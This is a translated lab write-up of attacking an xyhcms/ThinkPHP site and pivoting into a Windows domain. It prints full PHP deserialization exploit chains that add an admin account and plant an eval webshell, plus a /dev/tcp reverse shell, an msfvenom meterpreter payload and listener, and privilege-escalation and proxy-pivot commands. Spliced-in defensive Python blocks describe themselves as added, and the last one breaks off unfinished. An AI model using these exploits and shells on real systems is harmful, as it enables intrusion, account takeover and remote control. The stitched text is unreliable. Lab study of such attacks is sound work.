scaner: domain penetration from the external network to the intranet

This lab environment comes from master moonsec (暗月); everything in this article is my own understanding, so if there are mistakes, experts, go easy on me, my skills are limited. All techniques mentioned here come from practising on the lab range and are for learning and reference only; do not use the techniques in this article for illegal testing; the author is not responsible for any adverse consequences that result.

Environment setup

Lab information

Three virtual machines are used: 12server-db, 12-dc and web1.

12server-db and web1 can use bridged or NAT mode as needed (network adapter 1).

12-dc uses VMnet 19; this machine already has its IP bound.

Host   IP                             Account / password
web1   192.168.0.160                  web1 / root@123
db     192.168.0.161, 10.10.10.136    administrator / qweasd666
ad     10.10.10.135                   scaner\administrator / QWEasd000
                                      scaner\db / db123456

web1 site: http://192.168.0.160/xyhai.php?s=/Login/index  admin / 123456qq
External panel address: http://116.27.231.161:8888/e955a525
Internal panel address: http://192.168.0.160:8888/e955a525
username: m0gy9yes
password: c693d359

MSSQL service on the db host: sa / freepass

Visit http://192.168.0.160/

Network topology diagram

External foothold

Port scan

nmap -v -sV -A 192.168.0.160
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-01 11:28 CST
Happy 25th Birthday to Nmap, may it live to be 125!
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:28
Completed NSE at 11:28, 0.00s elapsed
Initiating NSE at 11:28
Completed NSE at 11:28, 0.00s elapsed
Initiating NSE at 11:28
Completed NSE at 11:28, 0.00s elapsed
Initiating Ping Scan at 11:28
Scanning 192.168.0.160 [2 ports]
Completed Ping Scan at 11:28, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:28
Completed Parallel DNS resolution of 1 host. at 11:28, 0.01s elapsed
Initiating Connect Scan at 11:28
Scanning 192.168.0.160 [1000 ports]
Discovered open port 8888/tcp on 192.168.0.160
Discovered open port 80/tcp on 192.168.0.160
Discovered open port 888/tcp on 192.168.0.160
Completed Connect Scan at 11:28, 4.57s elapsed (1000 total ports)
Initiating Service scan at 11:28
Scanning 3 services on 192.168.0.160
Completed Service scan at 11:29, 6.03s elapsed (3 services on 1 host)
NSE: Script scanning 192.168.0.160.
Initiating NSE at 11:29
Completed NSE at 11:29, 0.61s elapsed
Initiating NSE at 11:29
Completed NSE at 11:29, 0.03s elapsed
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
Nmap scan report for 192.168.0.160
Host is up (0.00099s latency).
Not shown: 994 filtered tcp ports (no-response)
PORT     STATE  SERVICE  VERSION
20/tcp   closed ftp-data
21/tcp   closed ftp
22/tcp   closed ssh
80/tcp   open   http     Apache httpd
|_http-server-header: Apache
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-favicon: Unknown favicon MD5: BC2D3C52FF445E759E5EB54AB8239359
|_http-title: \xE6\x88\x91\xE7\x9A\x84\xE7\xBD\x91\xE7\xAB\x99
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
888/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: 403 Forbidden
| http-methods:
|_  Supported Methods: POST OPTIONS HEAD GET
8888/tcp open   http     nginx
| http-title: \xE5\xAE\x89\xE5\x85\xA8\xE5\x85\xA5\xE5\x8F\xA3\xE6\xA0\xA1\xE9\xAA\x8C\xE5\xA4\xB1\xE8\xB4\xA5
|_Requested resource was /login
|_http-favicon: Unknown favicon MD5: B351F027909EE2AC274599CE01D004E9
| http-methods:
|_  Supported Methods: GET POST
Service Info: Host: 0b842aa5.phpmyadmin
NSE: Script Post-scanning.
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.85 seconds

Port 8888 turns out to be the BaoTa (宝塔) panel.

Information gathering

Visiting port 80

The site runs xyhcms; we look it up on https://evalshell.com/ for historical vulnerabilities.

Scanning the site with gobuster

A quick scan to get the site's directory structure

gobuster dir -u http://192.168.0.160/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x '.php' -o
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.160/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2022/09/01 11:46:11 Starting gobuster in directory enumeration mode
===============================================================
/home                 (Status: 200) [Size: 10964]
/archive              (Status: 200) [Size: 5485]
/index                (Status: 200) [Size: 10964]
/home.php             (Status: 200) [Size: 10964]
/search               (Status: 200) [Size: 4375]
/index.php            (Status: 200) [Size: 10964]
/uploads              (Status: 301) [Size: 300] [--> http://192.168.0.160/uploads/]
/0                    (Status: 200) [Size: 10964]
/go                   (Status: 200) [Size: 0]
/index2               (Status: 200) [Size: 383]
/mobile               (Status: 200) [Size: 7627]
/member               (Status: 302) [Size: 0] [--> /index.php?s=/Home/Public/login.html]
/mobile.php           (Status: 200) [Size: 7627]
/Home                 (Status: 200) [Size: 10964]
/Home.php             (Status: 200) [Size: 10964]
/show                 (Status: 200) [Size: 2829]
/special              (Status: 200) [Size: 4444]
/review               (Status: 200) [Size: 0]
/Search               (Status: 200) [Size: 4375]
/Index                (Status: 200) [Size: 10964]
/Archive              (Status: 200) [Size: 5485]
/guestbook            (Status: 200) [Size: 5129]
/avatar               (Status: 301) [Size: 299] [--> http://192.168.0.160/avatar/]
/Public               (Status: 301) [Size: 299] [--> http://192.168.0.160/Public/]
/LICENSE              (Status: 403) [Size: 262]
/Mobile               (Status: 200) [Size: 7627]
/Mobile.php           (Status: 200) [Size: 7627]
/Data                 (Status: 301) [Size: 297] [--> http://192.168.0.160/Data/]
/App                  (Status: 301) [Size: 296] [--> http://192.168.0.160/App/]

Directory listing is enabled

Browsable sensitive directory:

http://192.168.0.160/App/

ThinkPHP log directory

http://192.168.0.160/App/Runtime/Logs/Common/22_05_06.log
http://192.168.0.160/App/Runtime/Logs/Home/22_05_06.log

A directory error reveals the web root path

http://192.168.0.160/App/Runtime/common~runtime.php
Fatal error: Class 'Think\Think' not found in
/www/wwwroot/www.xycms.com/App/Runtime/common~runtime.php on line 65

xyhcms deserialization vulnerability analysis

xyhcms is built on the ThinkPHP 3.2.3 framework, so ThinkPHP's vulnerabilities are present by default (in my own testing I could not find them; probably the ThinkPHP version is too old and the exploitation tool has no PoC for it).

Losing a CVE: xyhcms (thinkphp3.2.3) deserialization: https://www.freebuf.com/articles/web/264645.html

The version that author describes is old; the new version has moved site.php into a directory with a random name, but because the site has directory listing enabled we can still reach it

http://192.168.0.160/App/Runtime/Data/3277c100b8afcccfb950d28a6ff7113c_config/site.php

First we download the matching CMS version and audit the code.

IDEA dynamic debugging setup

First enable xdebug

Find the php.ini of the PHP version in use, add the following to it, and restart the Apache service.

xdebug.remote_autostart=1
xdebug.remote_enable=On
xdebug.idekey="PHPSTORM"

IDEA: configure PHP and xdebug

Debug server settings

Configure the DBGp proxy

To test whether dynamic debugging works, set a breakpoint in the code and click listen.

xyhcms deserialization entry point analysis

Following the article, we search for unserialize and finally find the function below

/**
 * Get the value of the specified cookie
 * @param string $name
 */
//function get_cookie($name, $key = '@^%$y5fbl') {
function get_cookie($name, $key = '') {
    if (!isset($_COOKIE[$name])) {
        return null;
    }
    $key = empty($key) ? C('CFG_COOKIE_ENCODE') : $key;
    $value = $_COOKIE[$name];
    $key = md5($key);
    $sc = new \Common\Lib\SysCrypt($key);
    $value = $sc->php_decrypt($value);
    return unserialize($value);
}

From the comment and the code, this function reads a cookie; after fetching the cookie it decrypts it with php_decrypt, unserializes the result and returns it

Let's walk through the flow:

Read the cookie --> if key is empty, use the default key (the decryption class is loaded) and decrypt --> unserialize the decrypted content and return it

Because the site has directory listing enabled, the key can be read from the following file

http://www.xyhcms.com/App/Runtime/Data/3277c100b8afcccfb950d28a6ff7113c_config/site.php // VjP8u3rZw

Searching for uses of get_cookie shows that it is called when a regular member logs in

Let's register a regular member and verify this.

xyhcms encryption/decryption analysis

class SysCrypt {
    private $crypt_key;

    // Constructor
    public function __construct() {
        // $this -> crypt_key = $crypt_key;
        // A key has to be passed in when the class is instantiated, and we know that key,
        // so we can simply hard-code it
        $this->crypt_key = "VjP8u3rZw";
    }

    // Encrypt the given content
    public function php_encrypt($txt) {
        srand((double)microtime() * 1000000);
        $encrypt_key = md5(rand(0, 32000));
        $ctr = 0;
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++) {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $encrypt_key[$ctr] . ($txt[$i] ^ $encrypt_key[$ctr++]);
        }
        return base64_encode(self::__key($tmp, $this->crypt_key));
    }

    // Decrypt the given content
    public function php_decrypt($txt) {
        $txt = self::__key(base64_decode($txt), $this->crypt_key);
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++) {
            $md5 = $txt[$i];
            $tmp .= $txt[++$i] ^ $md5;
        }
        return $tmp;
    }

    private function __key($txt, $encrypt_key) {
        $encrypt_key = md5($encrypt_key);
        $ctr = 0;
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++) {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
        }
        return $tmp;
    }

    public function __destruct() {
        $this->crypt_key = null;
    }
}
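Two things go wrong in the cookie path above: get_cookie hands whatever decrypts to unserialize(), and SysCrypt itself is a repeating XOR keystream with no integrity check, so a cookie that has been altered still decrypts without error. The following is an added example, not code from the post or from xyhcms: a Python port of SysCrypt's three methods, used to show that flipping one ciphertext byte silently changes one plaintext byte, next to an HMAC-SHA256-signed JSON cookie that rejects the same edit before anything is parsed. The key handling mirrors get_cookie (SysCrypt receives md5 of the site key); COOKIE_SECRET, the fixed per-message key and the sample cookie payload are constructed placeholders.

```python
import base64
import hashlib
import hmac
import json


def _key_stream_xor(data: bytes, crypt_key: str) -> bytes:
    """SysCrypt::__key: XOR with the 32 hex characters of md5(crypt_key), repeated."""
    ks = hashlib.md5(crypt_key.encode()).hexdigest().encode()
    return bytes(b ^ ks[i % len(ks)] for i, b in enumerate(data))


def php_encrypt(plain: bytes, crypt_key: str, msg_key: str) -> str:
    """SysCrypt::php_encrypt. PHP draws msg_key as md5(rand(0, 32000)); it is a
    parameter here so the result is reproducible. Each per-message key byte is
    written directly in front of the byte it masks, so crypt_key is the only secret."""
    mk = msg_key.encode()
    interleaved = bytearray()
    for i, b in enumerate(plain):
        k = mk[i % len(mk)]
        interleaved += bytes([k, b ^ k])
    return base64.b64encode(_key_stream_xor(bytes(interleaved), crypt_key)).decode()


def php_decrypt(token: str, crypt_key: str) -> bytes:
    """SysCrypt::php_decrypt: undo the outer XOR, then un-interleave."""
    raw = _key_stream_xor(base64.b64decode(token), crypt_key)
    return bytes(raw[i + 1] ^ raw[i] for i in range(0, len(raw) - 1, 2))


def flip_byte(token: str, index: int, mask: int) -> str:
    """Alter one ciphertext byte. Nothing in SysCrypt notices: decryption still
    succeeds and the matching plaintext byte is changed by the same mask."""
    raw = bytearray(base64.b64decode(token))
    raw[index] ^= mask
    return base64.b64encode(bytes(raw)).decode()


def tamper_demo(crypt_key: str = hashlib.md5(b"VjP8u3rZw").hexdigest()) -> tuple:
    """Constructed sample payload; returns (decrypted original, decrypted tampered)."""
    original = b'a:1:{s:4:"user";s:5:"guest";}'
    token = php_encrypt(original, crypt_key, "0" * 32)      # fixed per-message key
    j = original.index(b"g")                                 # plaintext byte to change
    forged = flip_byte(token, 2 * j + 1, ord("g") ^ ord("q"))  # its ciphertext position
    return php_decrypt(token, crypt_key), php_decrypt(forged, crypt_key)


# Hardened alternative: sign a JSON body and verify the tag before parsing;
# json.loads cannot instantiate classes the way unserialize() does.
COOKIE_SECRET = b"placeholder-random-server-secret"   # placeholder, not a real key


def seal(data: dict, secret: bytes = COOKIE_SECRET) -> str:
    body = json.dumps(data, sort_keys=True, separators=(",", ":")).encode()
    tag = hmac.new(secret, body, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(tag + body).decode()


def open_sealed(token: str, secret: bytes = COOKIE_SECRET):
    """Return the cookie's dict, or None for anything that does not verify."""
    try:
        raw = base64.urlsafe_b64decode(token)
    except ValueError:                                   # binascii.Error is a ValueError
        return None
    tag, body = raw[:32], raw[32:]
    expected = hmac.new(secret, body, hashlib.sha256).digest()
    if len(tag) != 32 or not hmac.compare_digest(tag, expected):
        return None
    return json.loads(body)


def sealed_tamper_demo() -> tuple:
    """The same single-byte edit as above, applied to the signed cookie."""
    token = seal({"user": "guest"})
    raw = bytearray(base64.urlsafe_b64decode(token))
    raw[32 + b'{"user":"guest"}'.index(b"g")] ^= ord("g") ^ ord("q")
    forged = base64.urlsafe_b64encode(bytes(raw)).decode()
    return open_sealed(token), open_sealed(forged)
```

tamper_demo() returns the unchanged payload next to one whose "guest" has become "quest" with no error raised, while sealed_tamper_demo() returns the parsed dict next to None. The second design is what a fix for this class of bug looks like: a server-side secret that is not readable from the web root, a MAC over the bytes that will be parsed, and a data format that cannot create objects.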

Exploiting the deserialization to add a backend administrator

I'm still too much of a novice; I couldn't follow the rest of the article.

The exploitation method from the article:

  1. Leak the target's web directory from somewhere (e.g. a DEBUG page)
  2. Start a malicious MySQL server and set the file to read to the target's database configuration file
  3. Trigger the deserialization
  4. Trigger the PDO connection part of the chain
  5. Obtain the target's database configuration
  6. Trigger the deserialization again using the target's database configuration
  7. Trigger the SQL injection in the DELETE statement of the chain

Article: https://mp.weixin.qq.com/s/S3Un1EM-cftFXr8hxG4qfA

POC

<?php
namespace Think\Db\Driver {
    use PDO;
    class Mysql {
        protected $options = array(
            PDO::MYSQL_ATTR_LOCAL_INFILE => true    // must be enabled to read files
        );
        protected $config = array(
            "debug"    => 1,
            "database" => "thinkphp3",
            "hostname" => "127.0.0.1",
            "hostport" => "3306",
            "charset"  => "utf8",
            "username" => "root",
            "password" => ""
        );
    }
}
namespace Think\Image\Driver {
    use Think\Session\Driver\Memcache;
    class Imagick {
        private $img;
        public function __construct() {
            $this->img = new Memcache();
        }
    }
}
namespace Think\Session\Driver {
    use Think\Model;
    class Memcache {
        protected $handle;
        public function __construct() {
            $this->handle = new Model();
        }
    }
}
namespace Think {
    use Think\Db\Driver\Mysql;
    class Model {
        protected $options = array();
        protected $pk;
        protected $data = array();
        protected $db = null;
        public function __construct() {
            $this->db = new Mysql();
            $this->options['where'] = '';
            $this->pk = 'id';
            $this->data[$this->pk] = array(
                "table" => "mysql.user where 1=updatexml(1,user(),1)#",
                "where" => "1=1"
            );
        }
    }
}
namespace {
    echo base64_encode(serialize(new Think\Image\Driver\Imagick()));
}

Reading files with a rogue MySQL server

GitHub: https://github.com/Gifts/Rogue-MySql-Server

Change the file to read in the exp to

C:\\Penetration\\TrafficTools\\phpStudyV8\\WWW\\www.xyhcms.com\\App\\Common\\Conf\\db.php

The site's path can be obtained from the errors shown when visiting the following URLs

/App/Api/Conf/config.php

/App/Api/Controller/ApiCommonController.class.php

/App/Common/LibTag/Other.class.php

/App/Common/Model/ArcViewModel.class.php

Change the MySQL address in the PoC above to ours

<?php
namespace Think\Db\Driver;
use PDO;
class Mysql {
    protected $options = array(PDO::MYSQL_ATTR_LOCAL_INFILE => true);
    protected $config = array(
        "dsn"      => "mysql:host=192.168.0.23;dbname=xyhcms;port=3306",
        "username" => "root",
        "password" => "root"
    );
}
namespace Think;
class Model {
    protected $options = array();
    protected $pk;
    protected $data = array();
    protected $db = null;
    public function __construct() {
        $this->db = new \Think\Db\Driver\Mysql();
        $this->options['where'] = '';
        $this->pk = 'luoke';
        $this->data[$this->pk] = array("table" => "xyh_admin_log", "where" => "id=0");
    }
}
namespace Think\Session\Driver;
class Memcache {
    protected $handle;
    public function __construct() {
        $this->handle = new \Think\Model();
    }
}
namespace Think\Image\Driver;
class Imagick {
    private $img;
    public function __construct() {
        $this->img = new \Think\Session\Driver\Memcache();
    }
}
namespace Common\Lib;
class SysCrypt {
    private $crypt_key;
    public function __construct($crypt_key) {
        $this->crypt_key = $crypt_key;
    }
    public function php_encrypt($txt) {
        srand((double)microtime() * 1000000);
        $encrypt_key = md5(rand(0, 32000));
        $ctr = 0;
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++) {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $encrypt_key[$ctr] . ($txt[$i] ^ $encrypt_key[$ctr++]);
        }
        return base64_encode(self::__key($tmp, $this->crypt_key));
    }
    public function php_decrypt($txt) {
        $txt = self::__key(base64_decode($txt), $this->crypt_key);
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++) {
            $md5 = $txt[$i];
            $tmp .= $txt[++$i] ^ $md5;
        }
        return $tmp;
    }
    private function __key($txt, $encrypt_key) {
        $encrypt_key = md5($encrypt_key);
        $ctr = 0;
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++) {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
        }
        return $tmp;
    }
    public function __destruct() {
        $this->crypt_key = null;
    }
}
function get_cookie($name, $key = '') {
    $key = 'VjP8u3rZw';
    $key = md5($key);
    $sc = new \Common\Lib\SysCrypt($key);
    $value = $sc->php_decrypt($name);
    return unserialize($value);
}
function set_cookie($args, $key = '') {
    $key = 'VjP8u3rZw';
    $value = serialize($args);
    $key = md5($key);
    $sc = new \Common\Lib\SysCrypt($key);
    $value = $sc->php_encrypt($value);
    return $value;
}
$b = new \Think\Image\Driver\Imagick();
$a = set_cookie($b, '');
echo str_replace('+', '%2B', $a);

xyhcms getshell

Use the following PoC to insert an administrator account test with password 123456

<?php
namespace Think\Db\Driver;
use PDO;
class Mysql {
    protected $options = array(PDO::MYSQL_ATTR_LOCAL_INFILE => true);
    protected $config = array(
        "dsn"      => "mysql:host=127.0.0.1;dbname=www_xycms_com;port=3306",
        "username" => "root",
        "password" => "9a973fd7928bb3c2"
    );
}
namespace Think;
class Model {
    protected $options = array();
    protected $pk;
    protected $data = array();
    protected $db = null;
    public function __construct() {
        $this->db = new \Think\Db\Driver\Mysql();
        $this->options['where'] = '';
        $this->pk = 'luoke';
        $this->data[$this->pk] = array(
            "table" => "xyh_admin_log",
            "where" => "id=0;insert into www_xycms_com.xyh_admin (id,username,password,encrypt,user_type,is_lock,login_num) VALUES (null,'test','88bf2f72156e8e2accc2215f7a982a83','sggFkZ',9,0,4);"
        );
    }
}
namespace Think\Session\Driver;
class Memcache {
    protected $handle;
    public function __construct() {
        $this->handle = new \Think\Model();
    }
}
namespace Think\Image\Driver;
class Imagick {
    private $img;
    public function __construct() {
        $this->img = new \Think\Session\Driver\Memcache();
    }
}
namespace Common\Lib;
class SysCrypt {
    private $crypt_key;
    public function __construct($crypt_key) {
        $this->crypt_key = $crypt_key;
    }
    public function php_encrypt($txt) {
        srand((double)microtime() * 1000000);
        $encrypt_key = md5(rand(0, 32000));
        $ctr = 0;
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++) {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $encrypt_key[$ctr] . ($txt[$i] ^ $encrypt_key[$ctr++]);
        }
        return base64_encode(self::__key($tmp, $this->crypt_key));
    }
    public function php_decrypt($txt) {
        $txt = self::__key(base64_decode($txt), $this->crypt_key);
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++) {
            $md5 = $txt[$i];
            $tmp .= $txt[++$i] ^ $md5;
        }
        return $tmp;
    }
    private function __key($txt, $encrypt_key) {
        $encrypt_key = md5($encrypt_key);
        $ctr = 0;
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++) {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
        }
        return $tmp;
    }
    public function __destruct() {
        $this->crypt_key = null;
    }
}
function get_cookie($name) {
    $key = 'P4tzizR6d';
    $key = md5($key);
    $sc = new \Common\Lib\SysCrypt($key);
    $value = $sc->php_decrypt($name);
    return unserialize($value);
}
function set_cookie($args) {
    $key = 'P4tzizR6d';
    $value = serialize($args);
    $key = md5($key);
    $sc = new \Common\Lib\SysCrypt($key);
    $value = $sc->php_encrypt($value);
    return $value;
}
use \Think\Image\Driver\Imagick;
echo set_cookie(new Imagick());

Use the following exp to insert a one-line webshell

<?php
namespace Think\Db\Driver;
use PDO;
class Mysql {
    protected $options = array(PDO::MYSQL_ATTR_LOCAL_INFILE => true);
    protected $config = array(
        "dsn"      => "mysql:host=127.0.0.1;dbname=www_xycms_com;port=3306",
        "username" => "root",
        "password" => "9a973fd7928bb3c2"
    );
}
namespace Think;
class Model {
    protected $options = array();
    protected $pk;
    protected $data = array();
    protected $db = null;
    public function __construct() {
        $this->db = new \Think\Db\Driver\Mysql();
        $this->options['where'] = '';
        $this->pk = 'luoke';
        $this->data[$this->pk] = array(
            "table" => "xyh_admin_log",
            "where" => "id=0; alter table xyh_guestbook add column `<script language='php'>eval(\$_POST[x]);</script>` varchar(10);"
        );
    }
}
namespace Think\Session\Driver;
class Memcache {
    protected $handle;
    public function __construct() {
        $this->handle = new \Think\Model();
    }
}
namespace Think\Image\Driver;
class Imagick {
    private $img;
    public function __construct() {
        $this->img = new \Think\Session\Driver\Memcache();
    }
}
namespace Common\Lib;
class SysCrypt {
    private $crypt_key;
    public function __construct($crypt_key) {
        $this->crypt_key = $crypt_key;
    }
    public function php_encrypt($txt) {
        srand((double)microtime() * 1000000);
        $encrypt_key = md5(rand(0, 32000));
        $ctr = 0;
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++) {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $encrypt_key[$ctr] . ($txt[$i] ^ $encrypt_key[$ctr++]);
        }
        return base64_encode(self::__key($tmp, $this->crypt_key));
    }
    public function php_decrypt($txt) {
        $txt = self::__key(base64_decode($txt), $this->crypt_key);
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++) {
            $md5 = $txt[$i];
            $tmp .= $txt[++$i] ^ $md5;
        }
        return $tmp;
    }
    private function __key($txt, $encrypt_key) {
        $encrypt_key = md5($encrypt_key);
        $ctr = 0;
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++) {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
        }
        return $tmp;
    }
    public function __destruct() {
        $this->crypt_key = null;
    }
}
function get_cookie($name) {
    $key = 'P4tzizR6d';
    $key = md5($key);
    $sc = new \Common\Lib\SysCrypt($key);
    $value = $sc->php_decrypt($name);
    return unserialize($value);
}
function set_cookie($args) {
    $key = 'P4tzizR6d';
    $value = serialize($args);
    $key = md5($key);
    $sc = new \Common\Lib\SysCrypt($key);
    $value = $sc->php_encrypt($value);
    return $value;
}
use \Think\Image\Driver\Imagick;
echo set_cookie(new Imagick());

Clear the cache in the backend, visit http://192.168.0.160//index.php?s=/Guestbook/index.html to regenerate the cache, then send the deserialization exp again

# webshell address
http://192.168.0.160/App/Runtime/Data/3277c100b8afcccfb950d28a6ff7113c__fields/www_xycms_com.xyh_guestbook.php

Linux privilege escalation

Bypassing BaoTa's command-execution restriction

Here we can see that commands cannot be executed; we already knew this site was built with BaoTa, and BaoTa disables many sensitive functions.

BT blocks command execution; this can be bypassed with a plugin if the file /tmp/php-cgi-56.sock exists under tmp

It can be bypassed via PHP-FPM

Use the bypassing webshell to run commands and gather system information.

unix:///tmp/php-cgi-56.sock

First we pop a reverse shell to make privilege escalation easier

sh -i >& /dev/tcp/192.168.0.23/6666 0>&1

Spawn an interactive shell with python

python3 -c 'import pty;pty.spawn("/bin/bash")'

Search kali for privilege-escalation exploits

searchsploit ubuntu 5.4.0

Nothing useful turned up, so we use the newer privilege-escalation vulnerability CVE-2021-3493; upload our file through the webshell

chmod +x exploit.c
gcc -o exploit exploit.c
chmod +x exploit
./exploit

Getting a session in MSF

Generate the payload

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.0.23 LPORT=5555 -f elf > shell.elf

Set up the listener

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.0.23
set lport 5555
run

Upload the payload and run it as root

chmod +x shell.elf
./shell.elf

Successfully obtained a root shell

Internal network penetration

Check network adapters

Only one subnet exists: 192.168.0.1/24

Set up routing and a proxy, then scan the intranet with fscan

Set up routing

# add the route
run autoroute -s 192.168.0.1/24
# show routes
run autoroute -p

Set up the proxy

background
use auxiliary/server/socks_proxy

Configure /etc/proxychains4.conf

socks5  127.0.0.1 1080

Scan the intranet with fscan

proxychains4 ./fscan_amd64_1.6 -h 192.168.0.1/24
# scan result
start infoscan
The current user permissions unable to send icmp packets
start ping
(icmp) Target '192.168.0.1' is alive
(icmp) Target '192.168.0.2' is alive
(icmp) Target '192.168.0.23' is alive
(icmp) Target '192.168.0.161' is alive
(icmp) Target '192.168.0.160' is alive
icmp alive hosts len is: 5
192.168.0.161:1433 open
192.168.0.161:445 open
192.168.0.1:445 open
192.168.0.161:139 open
192.168.0.161:80 open
192.168.0.160:80 open
192.168.0.161:135 open
192.168.0.1:139 open
192.168.0.1:135 open
192.168.0.160:888 open
192.168.0.23:1080 open
192.168.0.160:8888 open
alive ports len is: 12
start vulscan
[*] 192.168.0.1          WORKGROUP\PENETRATION
[+] 192.168.0.1 CVE-2020-0796 SmbGhost Vulnerable
NetInfo:
[*]192.168.0.161[->]db[->]10.10.10.136[->]192.168.0.161
[*] WebTitle:http://192.168.0.161      code:404 len:315    title:Not Found
[*] 192.168.0.161        SCANER\DB                Windows Server 2012 R2 Standard 9600
NetInfo:
[*]192.168.0.1[->]penetration[->]192.168.1.8[->]192.168.10.1[->]192.168.0.1[->]10.10.10.1[->]240e:398:54a4:1a50:8038:7e62:830b:2a04[->]240e:398:54a4:1a50:b871:fbd2:3951:ed0c
[*] WebTitle:http://192.168.0.160:888  code:403 len:263    title:403 Forbidden
[*] WebTitle:http://192.168.0.160:8888 code:302 len:199    title:Redirecting...
[*] WebTitle:http://192.168.0.160:8888/login code:200 len:24     title:安全入口校验失败
[+] InfoScan:http://192.168.0.160:8888/login [宝塔-BT.cn]
[*] WebTitle:http://192.168.0.160      code:200 len:12     title:我的网站
已完成 14/14
scan end

Host 192.168.0.161 has an MSSQL service
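The same fscan output is also what a defender would be handed after an internal scan. As an added example, not part of the original post and not fscan's own code: a small parser for the line shapes seen above that builds a per-host inventory, plus a review function that orders the findings the way they would be triaged (known-vulnerable hosts, then exposed high-value services, then hosts that bridge two networks, which is exactly how the pivot into 10.10.10.0/24 happens later). The sample is a subset of the lines from the scan above; the patterns cover only those line types, and anything else is skipped.

```python
import re
from collections import defaultdict

# Lines copied from the fscan run above (subset), in the shape fscan prints them.
SAMPLE_FSCAN_OUTPUT = r"""
(icmp) Target '192.168.0.1' is alive
(icmp) Target '192.168.0.161' is alive
(icmp) Target '192.168.0.160' is alive
192.168.0.161:1433 open
192.168.0.161:445 open
192.168.0.1:445 open
192.168.0.160:80 open
192.168.0.160:8888 open
[*] 192.168.0.1          WORKGROUP\PENETRATION
[+] 192.168.0.1 CVE-2020-0796 SmbGhost Vulnerable
NetInfo:
[*]192.168.0.161[->]db[->]10.10.10.136[->]192.168.0.161
[*] WebTitle:http://192.168.0.161      code:404 len:315    title:Not Found
[*] 192.168.0.161        SCANER\DB                Windows Server 2012 R2 Standard 9600
[+] InfoScan:http://192.168.0.160:8888/login [宝塔-BT.cn]
"""

ALIVE_RE = re.compile(r"^\(icmp\) Target '([\d.]+)' is alive$")
PORT_RE = re.compile(r"^([\d.]+):(\d+) open$")
VULN_RE = re.compile(r"^\[\+\] ([\d.]+) (CVE-\d{4}-\d+.*)$")
NETINFO_RE = re.compile(r"^\[\*\]([\d.]+)\[->\](\S+?)\[->\](.*)$")
WEB_RE = re.compile(r"^\[\*\] WebTitle:(\S+)\s+code:(\d+)\s+len:\d+\s+title:(.*)$")
INFOSCAN_RE = re.compile(r"^\[\+\] InfoScan:(\S+) \[(.*)\]$")
OS_RE = re.compile(r"^\[\*\] ([\d.]+)\s+(\S+\\\S+)\s*(.*)$")


def _new_host() -> dict:
    return {"ports": [], "vulns": [], "hostname": None, "netbios": None,
            "os": None, "web": [], "fingerprints": [], "other_ips": []}


def _ip_of(url: str) -> str:
    return re.search(r"//([\d.]+)", url).group(1)


def parse_fscan(text: str) -> dict:
    """Map ip -> inventory record built from the recognised fscan line types."""
    hosts = defaultdict(_new_host)
    for line in text.strip().splitlines():
        line = line.rstrip()
        if m := ALIVE_RE.match(line):
            _ = hosts[m.group(1)]                    # register host even with no open ports
        elif m := PORT_RE.match(line):
            hosts[m.group(1)]["ports"].append(int(m.group(2)))
        elif m := VULN_RE.match(line):
            hosts[m.group(1)]["vulns"].append(m.group(2))
        elif m := NETINFO_RE.match(line):
            ip, name, rest = m.groups()
            hosts[ip]["hostname"] = name
            hosts[ip]["other_ips"] = [a for a in rest.split("[->]") if a != ip]
        elif m := WEB_RE.match(line):
            url, code, title = m.groups()
            hosts[_ip_of(url)]["web"].append((url, int(code), title.strip()))
        elif m := INFOSCAN_RE.match(line):
            url, product = m.groups()
            hosts[_ip_of(url)]["fingerprints"].append((url, product))
        elif m := OS_RE.match(line):
            ip, netbios, os_name = m.groups()
            hosts[ip]["netbios"] = netbios
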